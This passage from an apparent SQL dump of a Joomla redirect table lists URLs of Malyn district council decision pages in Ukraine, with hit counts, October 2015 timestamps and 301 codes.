00:00:00',301),(15041,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/870-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-po-viznachennyu-normativnoji-groshovoji-otsinki-zemelnoji-dilyanki-shcho-peredaetsya-v-orendu-tov-naftova-budive','','','',1,0,'2015-10-30 10:36:54','0000-00-00 00:00:00',301),(15042,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-?start=7','','','',14,0,'2015-10-30 10:37:05','0000-00-00 00:00:00',301),(15043,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/201-pro-vnesennja-zmin-ta-dopovnen-do-rishennja','','','',23,0,'2015-10-30 10:38:41','0000-00-00 00:00:00',301),(15044,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-?start=14','','','',11,0,'2015-10-30 10:39:24','0000-00-00 00:00:00',301),(15045,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012?start=14','','','',46,0,'2015-10-30 10:42:04','0000-00-00 00:00:00',301),(15046,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1052-pro-dostrokove-pripinennya-povnovazhen-zastupnika-golovi-rajonnoji-radi-levkovtsya-m-s','','','',22,0,'2015-10-30 10:43:47','0000-00-00 00:00:00',301),(15047,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku','','','',29,0,'2015-10-30 10:49:13','0000-00-00 00:00:00',301),(15048,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/9-pro-zminu-nazvi-ta-zatverdzhennja-polozhennja','','','',18,0,'2015-10-30 10:50:47','0000-00-00 00:00:00',301),(15049,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--23042013-','','','',38,0,'2015-10-30 10:52:15','0000-00-00 00:00:00',301),(15050,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1147-lyubovitska-silska-rada-informue','','','',24,0,'2015-10-30 10:52:39','0000-00-00 00:00:00',301),(15051,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=659:-2011-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2015-10-30 11:04:05','0000-00-00 00:00:00',301),(15052,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1169-pro-neobkhidnist-vzyattya-na-oblik-bezkhazyajnogo-nerukhomogo-majna','','','',23,0,'2015-10-30 11:05:32','0000-00-00 00:00:00',301),(15053,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=37&Itemid=72&lang=ru&limitstart=15','','','',7,0,'2015-10-30 11:06:00','0000-00-00 00:00:00',301),(15054,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-09-2014-roku/879-pro-nadannya-prava-malinskij-rajonnij-radi-zdijsniti-pererakhuvannya-koshtiv','','','',23,0,'2015-10-30 11:10:33','0000-00-00 00:00:00',301),(15055,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/924-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-z-normativnoji-groshovoji-otsinki-zemelnoji-dilyanki-yaka-peredaetsya-v-or','','','',1,0,'2015-10-30 11:13:26','0000-00-00 00:00:00',301),(15056,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-?start=7','','','',28,0,'2015-10-30 11:13:34','0000-00-00 00:00:00',301),(15057,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=39&layout=blog&Itemid=76&lang=uk&limitstart=5','','','',4,0,'2015-10-30 11:14:04','0000-00-00 00:00:00',301),(15058,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012?start=5','','','',14,0,'2015-10-30 11:15:13','0000-00-00 00:00:00',301),(15059,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1062-oprilyudnennya-vidomostej-pro-dokhodi-za-2014-rik-kerivnitstva-lukivskoji-silskoji-radi','','','',18,0,'2015-10-30 11:19:07','0000-00-00 00:00:00',301),(15060,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-?start=25','','','',10,0,'2015-10-30 11:31:41','0000-00-00 00:00:00',301),(15061,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1085-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-pro-normativnu-groshovu-otsinku-zemelnoji-dilyanki-shcho-peredaetsya-v-orendu-gr-andrijchuk-t-i-ta-gr-andr','','','',1,0,'2015-10-30 11:31:44','0000-00-00 00:00:00',301),(15062,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=56&Itemid=97&lang=en','','','',13,0,'2015-10-30 11:31:58','0000-00-00 00:00:00',301),(15063,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=33&Itemid=66&lang=en','','','',54,0,'2015-10-30 11:32:11','0000-00-00 00:00:00',301),(15064,'http://www.malyn-rayrada.org.ua/index.php/1140-starovorob-jivska-silska-rada-informue','','','',7,0,'2015-10-30 11:32:22','0000-00-00 00:00:00',301),(15065,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1046-pro-nadannya-primishchennya-ta-zvilnennya-vid-plati-za-koristuvannya-komunalnimi-poslugami-radi-malinskoji-rajonnoji-organizatsiji-veteraniv','','','',21,0,'2015-10-30 11:33:57','0000-00-00 00:00:00',301),(15066,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/965-pro-vnesennya-zmin-do-kompleksnoji-dovgostrokovoji-programi-rozvitku-zemelnikh-vidnosin-ta-okhoroni-zemel-u-malinskomu-rajoni-na-2007-2015-roki','','','',19,0,'2015-10-30 11:34:12','0000-00-00 00:00:00',301),(15067,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=345:2011-06-15-12-28-17&catid=34&Itemid=68&lang=en','','','',8,0,'2015-10-30 11:36:45','0000-00-00 00:00:00',301),(15068,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-16-06-2015-roku/1110-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi','','','',21,0,'2015-10-30 11:37:38','0000-00-00 00:00:00',301),(15069,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=597:-l-r-2011-&catid=40&Itemid=77&lang=en','','','',6,0,'2015-10-30 11:48:10','0000-00-00 00:00:00',301),(15070,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=206:2010-12-15-14-19-27&catid=29&Itemid=60&lang=uk','','','',6,0,'2015-10-30 11:51:54','0000-00-00 00:00:00',301),(15071,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-?start=14','','','',33,0,'2015-10-30 11:52:43','0000-00-00 00:00:00',301),(15072,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=56&layout=blog&Itemid=97&lang=uk&limitstart=5','','','',4,0,'2015-10-30 11:53:13','0000-00-00 00:00:00',301),(15073,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/370-pro-zatverdzhennja-spisku-prisjazhnih-malinskogo','','','',40,0,'2015-10-30 11:53:44','0000-00-00 00:00:00',301),(15074,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=864:------qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=ru','','','',4,0,'2015-10-30 11:53:56','0000-00-00 00:00:00',301),(15075,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1194-pro-programu-vidshkoduvannya-vidsotkiv-za-kreditami-otrimanimi-naselennyam-malinskogo-rajonu-na-vprovadzhennya-energozberigayuchikh-zakhodiv-u-2015-rotsi','','','',16,0,'2015-10-30 11:54:02','0000-00-00 00:00:00',301),(15076,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/551-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_10','','','',15,0,'2015-10-30 11:54:42','0000-00-00 00:00:00',301),(15077,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=49:--12042013-&layout=blog&Itemid=88&lang=uk','','','',7,0,'2015-10-30 11:54:43','0000-00-00 00:00:00',301),(15078,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=42&Itemid=80&lang=en&limitstart=5','','','',5,0,'2015-10-30 11:54:47','0000-00-00 00:00:00',301),(15079,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/222-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_6','','','',16,0,'2015-10-30 11:54:48','0000-00-00 00:00:00',301),(15080,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1020-pro-zatverdzhennya-spisku-prisyazhnikh-malinskogo-rajonnogo-sudu','','','',28,0,'2015-10-30 11:54:57','0000-00-00 00:00:00',301),(15081,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=50&Itemid=90&lang=uk','','','',7,0,'2015-10-30 11:54:59','0000-00-00 00:00:00',301),(15082,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=49&Itemid=88&lang=en','','','',16,0,'2015-10-30 11:55:15','0000-00-00 00:00:00',301),(15083,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=56&Itemid=97&lang=en&limitstart=5','','','',7,0,'2015-10-30 11:55:23','0000-00-00 00:00:00',301),(15084,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/490-pro-pogodzhennja-perejmenuvannja-naselenogo-punktu','','','',42,0,'2015-10-30 11:56:04','0000-00-00 00:00:00',301),(15085,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-?start=10','','','',7,0,'2015-10-30 11:56:06','0000-00-00 00:00:00',301),(15086,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1166-pro-khid-vikonannya-rajonnoji-programi-sotsialnoji-pidtrimki-vnutrishno-peremishchenikh-osib-z-timchasovo-okupovanoji-teritoriji','','','',16,0,'2015-10-30 11:56:35','0000-00-00 00:00:00',301),(15087,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=53&Itemid=94&lang=uk&limitstart=5','','','',6,0,'2015-10-30 11:57:06','0000-00-00 00:00:00',301),(15088,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=33&layout=blog&Itemid=66&lang=ru&limitstart=5','','','',4,0,'2015-10-30 11:57:08','0000-00-00 00:00:00',301),(15089,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/138-pro-rezervuvannja-zemel','','','',28,0,'2015-10-30 11:57:11','0000-00-00 00:00:00',301),(15090,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-?start=5','','','',4,0,'2015-10-30 11:57:12','0000-00-00 00:00:00',301),(15091,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=48:--11032013-&layout=blog&Itemid=87&lang=ru','','','',7,0,'2015-10-30 11:57:19','0000-00-00 00:00:00',301),(15092,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/546-pro-zminu-nazvi-vorsivskoi-zosh-i-ii-stupeniv','','','',22,0,'2015-10-30 11:58:42','0000-00-00 00:00:00',301),(15093,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/208-pro-zatverdzhennja-polozhennja-pro-orendu-majna','','','',12,0,'2015-10-30 12:04:25','0000-00-00 00:00:00',301),(15094,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1050-pro-rajonnu-programu-rozvitku-ta-utrimannya-avtomobilnikh-dorig-na-teritoriji-malinskogo-rajonu-na-2015-2017-roki','','','',22,0,'2015-10-30 12:05:52','0000-00-00 00:00:00',301),(15095,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/963-pro-stan-zakonnosti-ta-pravoporyadku-na-teritoriji-malinskogo-rajonu-za-11-misyatsiv-2014-roku','','','',10,0,'2015-10-30 12:05:59','0000-00-00 00:00:00',301),(15096,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=833:2012-11-30-06-51-18&catid=11&lang=uk&Itemid=0','','','',2,0,'2015-10-30 12:06:26','0000-00-00 00:00:00',301),(15097,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1001-pro-programu-sotsialno-ekonomichnogo-rozvitku-malinskogo-rajonu-na-2015-rik','','','',43,0,'2015-10-30 12:06:51','0000-00-00 00:00:00',301),(15098,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku?start=7','','','',15,0,'2015-10-30 12:09:21','0000-00-00 00:00:00',301),(15099,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1087-pro-plan-roboti-rajonnoji-radi-na-ii-pivrichchya-2015-roku','','','',41,0,'2015-10-30 12:09:25','0000-00-00 00:00:00',301),(15100,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=31&Itemid=62&lang=ru','','','',28,0,'2015-10-30 12:09:56','0000-00-00 00:00:00',301),(15101,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/206-pro-hid-vikonannja-kompleksnoi-dovgostrokovoi','','','',10,0,'2015-10-30 12:10:59','0000-00-00 00:00:00',301),(15102,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012?start=10','','','',16,0,'2015-10-30 12:17:21','0000-00-00 00:00:00',301),(15103,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku?start=7','','','',24,0,'2015-10-30 12:17:25','0000-00-00 00:00:00',301),(15104,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=58&Itemid=105&lang=en','','','',12,0,'2015-10-30 12:32:26','0000-00-00 00:00:00',301),(15105,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/925-pro-nadannya-dozvolu-na-vlashtuvannya-rudenko-k-v-do-chopovitskogo-statsionarnogo-viddilennya-postijnogo-prozhivannya-odinokikh-nepratsezdatnikh-gromadyan','','','',4,0,'2015-10-30 12:32:51','0000-00-00 00:00:00',301),(15106,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-?start=20','','','',6,0,'2015-10-30 12:33:13','0000-00-00 00:00:00',301),(15107,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=46&Itemid=85&lang=en','','','',7,0,'2015-10-30 12:33:20','0000-00-00 00:00:00',301),(15108,'http://www.malyn-rayrada.org.ua/attachments/148_plugin-reiting.pdf','','','',15,0,'2015-10-30 12:33:57','0000-00-00 00:00:00',301),(15109,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/530-pro-nadannja-dozvolu-na-rozroblennja-detalnogo','','','',17,0,'2015-10-30 12:36:20','0000-00-00 00:00:00',301),(15110,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/491-pro-zatverdzhennja-polozhennja-pro-vidznaku-90','','','',53,0,'2015-10-30 12:36:34','0000-00-00 00:00:00',301),(15111,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=59:--20062014-&layout=blog&Itemid=107&lang=uk','','','',7,0,'2015-10-30 12:37:02','0000-00-00 00:00:00',301),(15112,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1188-pro-vnesennya-zmin-do-strukturi-vikonavchogo-aparatu-rajonnoji-radi','','','',19,0,'2015-10-30 12:38:56','0000-00-00 00:00:00',301),(15113,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011','','','',93,0,'2015-10-30 12:39:24','0000-00-00 00:00:00',301),(15114,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/995-pro-vstanovlennya-rozmiru-vartosti-kharchuvannya-ta-batkivskoji-plati-u-doshkilnikh-navchalnikh-zakladakh','','','',82,0,'2015-10-30 12:46:35','0000-00-00 00:00:00',301),(15115,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/969-pro-zvernennya-do-golovi-zhitomirskoji-oblasnoji-radi-shchodo-vidmini-pogodzhennya-dp-ob-ednana-girnicho-khimichna-kompaniya','','','',117,0,'2015-10-30 12:48:05','0000-00-00 00:00:00',301),(15116,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-?limitstart=0','','','',12,0,'2015-10-30 12:57:04','0000-00-00 00:00:00',301),(15117,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1147-lyubovitska-silska-rada-informue','','','',9,0,'2015-10-30 12:59:39','0000-00-00 00:00:00',301),(15118,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1190-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-pro-normativnu-groshovu-otsinku-zemelnoji-dilyanki-shcho-peredaetsya-v-orendu-tov-yunigran','','','',18,0,'2015-10-30 13:03:13','0000-00-00 00:00:00',301),(15119,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=43&Itemid=82&lang=uk&limitstart=20','','','',5,0,'2015-10-30 13:03:56','0000-00-00 00:00:00',301),(15120,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=660:-12-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',49,0,'2015-10-30 13:05:15','0000-00-00 00:00:00',301),(15121,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=59:--20062014-&layout=blog&Itemid=107&lang=ru&limitstart=15','','','',3,0,'2015-10-30 13:05:18','0000-00-00 00:00:00',301),(15122,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/355-pro-skasuvannja-rishennja-rajonnoi-radi-vid-27-04','','','',16,0,'2015-10-30 13:05:22','0000-00-00 00:00:00',301),(15123,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=37&Itemid=72&lang=en&limitstart=5','','','',4,0,'2015-10-30 13:05:29','0000-00-00 00:00:00',301),(15124,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=46&Itemid=85&lang=en&limitstart=15','','','',3,0,'2015-10-30 13:06:31','0000-00-00 00:00:00',301),(15125,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-?start=7','','','',69,0,'2015-10-30 13:09:16','0000-00-00 00:00:00',301),(15126,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1193-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi','','','',15,0,'2015-10-30 13:10:37','0000-00-00 00:00:00',301),(15127,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=530:-4050-vi-l-r-1-2013-&catid=11&Itemid=14&lang=ru','','','',5,0,'2015-10-30 13:10:54','0000-00-00 00:00:00',301),(15128,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=651:-2012-&catid=42&Itemid=80&lang=uk','','','',8,0,'2015-10-30 13:23:29','0000-00-00 00:00:00',301),(15129,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=320:-2010-2014-&catid=33&Itemid=66&lang=uk','','','',7,0,'2015-10-30 13:24:27','0000-00-00 00:00:00',301),(15130,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=692:-2012&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2015-10-30 13:29:29','0000-00-00 00:00:00',301),(15131,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12092012-/142-pro-nadannja-dozvolu-na-vidchuzhennja-ob’ekta','','','',114,0,'2015-10-30 13:32:44','0000-00-00 00:00:00',301),(15132,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12092012-/142-pro-nadannja-dozvolu-na-vidchuzhennja-ob’ekta?tmpl=component&print=1&layout=default&page=','','','',116,0,'2015-10-30 13:32:45','0000-00-00 00:00:00',301),(15133,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/398-pro-vnesennja-do-pereliku-ob’ektiv-shho','','','',119,0,'2015-10-30 13:32:47','0000-00-00 00:00:00',301),(15134,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/398-pro-vnesennja-do-pereliku-ob’ektiv-shho?tmpl=component&print=1&layout=default&page=','','','',117,0,'2015-10-30 13:32:49','0000-00-00 00:00:00',301),(15135,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/733-pro-peredachu-primishhennja-budo-vorob’ivskoi-zosh?tmpl=component&print=1&layout=default&page=','','','',116,0,'2015-10-30 13:32:51','0000-00-00 00:00:00',301),(15136,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--26122013-/688-pro-zminu-nazvi-novovorob’ivskogo-zagalnoosvitnogo?tmpl=component&print=1&layout=default&page=','','','',100,0,'2015-10-30 13:32:52','0000-00-00 00:00:00',301),(15137,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/287-pro-zatverdzhennja-pereliku-ob’ektiv-spilnoi_3','','','',102,0,'2015-10-30 13:32:54','0000-00-00 00:00:00',301),(15138,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/287-pro-zatverdzhennja-pereliku-ob’ektiv-spilnoi_3?tmpl=component&print=1&layout=default&page=','','','',101,0,'2015-10-30 13:32:56','0000-00-00 00:00:00',301),(15139,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/658-pro-stan-ohoroni-ob’ekta-nezavershenogo','','','',101,0,'2015-10-30 13:32:58','0000-00-00 00:00:00',301),(15140,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/658-pro-stan-ohoroni-ob’ekta-nezavershenogo?tmpl=component&print=1&layout=default&page=','','','',100,0,'2015-10-30 13:33:00','0000-00-00 00:00:00',301),(15141,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/181-pro-zatverdzhennja-pereliku-ob’ektiv-spilnoi_2','','','',101,0,'2015-10-30 13:33:02','0000-00-00 00:00:00',301),(15142,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/181-pro-zatverdzhennja-pereliku-ob’ektiv-spilnoi_2?tmpl=component&print=1&layout=default&page=','','','',101,0,'2015-10-30 13:33:03','0000-00-00 00:00:00',301),(15143,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/473-pro-nadannja-dozvolu-na-vidchuzhennja-ob’ekta_2','','','',99,0,'2015-10-30 13:33:05','0000-00-00 00:00:00',301),(15144,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/473-pro-nadannja-dozvolu-na-vidchuzhennja-ob’ekta_2?tmpl=component&print=1&layout=default&page=','','','',101,0,'2015-10-30 13:33:07','0000-00-00 00:00:00',301),(15145,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku','','','',81,0,'2015-10-30 13:38:41','0000-00-00 00:00:00',301),(15146,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=123:2010-09-09-11-29-29&catid=11&Itemid=16&lang=ru','','','',3,0,'2015-10-30 13:39:00','0000-00-00 00:00:00',301),(15147,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-','','','',32,0,'2015-10-30 13:39:26','0000-00-00 00:00:00',301),(15148,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12092012-/142-pro-nadannja-dozvolu-na-vidchuzhennja-ob’ekta','','','',111,0,'2015-10-30 13:39:34','0000-00-00 00:00:00',301),(15149,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12092012-/142-pro-nadannja-dozvolu-na-vidchuzhennja-ob’ekta?tmpl=component&print=1&layout=default&page=','','','',99,0,'2015-10-30 13:39:37','0000-00-00 00:00:00',301),(15150,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/398-pro-vnesennja-do-pereliku-ob’ektiv-shho','','','',93,0,'2015-10-30 13:39:41','0000-00-00 00:00:00',301),(15151,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/398-pro-vnesennja-do-pereliku-ob’ektiv-shho?tmpl=component&print=1&layout=default&page=','','','',84,0,'2015-10-30 13:39:43','0000-00-00 00:00:00',301),(15152,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/733-pro-peredachu-primishhennja-budo-vorob’ivskoi-zosh','','','',107,0,'2015-10-30 13:39:47','0000-00-00 00:00:00',301),(15153,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/733-pro-peredachu-primishhennja-budo-vorob’ivskoi-zosh?tmpl=component&print=1&layout=default&page=','','','',96,0,'2015-10-30 13:39:48','0000-00-00 00:00:00',301),(15154,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/537-pro-vnesennja-zmin-do-pereliku-ob’ektiv-spilnoi','','','',97,0,'2015-10-30 13:39:50','0000-00-00 00:00:00',301),(15155,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/805-pro-nadannja-statusu-ob’ekta-spilnogo','','','',104,0,'2015-10-30 13:39:52','0000-00-00 00:00:00',301),(15156,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/805-pro-nadannja-statusu-ob’ekta-spilnogo?tmpl=component&print=1&layout=default&page=','','','',97,0,'2015-10-30 13:39:54','0000-00-00 00:00:00',301),(15157,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/25-pro-zatverdzhennja-pereliku-ob’ektiv-spilnoi','','','',103,0,'2015-10-30 13:39:56','0000-00-00 00:00:00',301),(15158,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/25-pro-zatverdzhennja-pereliku-ob’ektiv-spilnoi?tmpl=component&print=1&layout=default&page=','','','',113,0,'2015-10-30 13:39:58','0000-00-00 00:00:00',301),(15159,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/630-pro-orendu-ob’ekta-spilnoi-vlasnosti-teritorialnih','','','',104,0,'2015-10-30 13:40:00','0000-00-00 00:00:00',301),(15160,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/630-pro-orendu-ob’ekta-spilnoi-vlasnosti-teritorialnih?tmpl=component&print=1&layout=default&page=','','','',96,0,'2015-10-30 13:40:01','0000-00-00 00:00:00',301),(15161,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/631-pro-peredachu-ob’ektiv-spilnoi-vlasnosti','','','',108,0,'2015-10-30 13:40:04','0000-00-00 00:00:00',301),(15162,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/631-pro-peredachu-ob’ektiv-spilnoi-vlasnosti?tmpl=component&print=1&layout=default&page=','','','',98,0,'2015-10-30 13:40:06','0000-00-00 00:00:00',301),(15163,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--26122013-/688-pro-zminu-nazvi-novovorob’ivskogo-zagalnoosvitnogo','','','',102,0,'2015-10-30 13:40:08','0000-00-00 00:00:00',301),(15164,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--26122013-/688-pro-zminu-nazvi-novovorob’ivskogo-zagalnoosvitnogo?tmpl=component&print=1&layout=default&page=','','','',82,0,'2015-10-30 13:40:10','0000-00-00 00:00:00',301),(15165,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/287-pro-zatverdzhennja-pereliku-ob’ektiv-spilnoi_3','','','',107,0,'2015-10-30 13:40:11','0000-00-00 00:00:00',301),(15166,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/287-pro-zatverdzhennja-pereliku-ob’ektiv-spilnoi_3?tmpl=component&print=1&layout=default&page=','','','',96,0,'2015-10-30 13:40:13','0000-00-00 00:00:00',301),(15167,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/658-pro-stan-ohoroni-ob’ekta-nezavershenogo','','','',111,0,'2015-10-30 13:40:15','0000-00-00 00:00:00',301),(15168,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/658-pro-stan-ohoroni-ob’ekta-nezavershenogo?tmpl=component&print=1&layout=default&page=','','','',98,0,'2015-10-30 13:40:16','0000-00-00 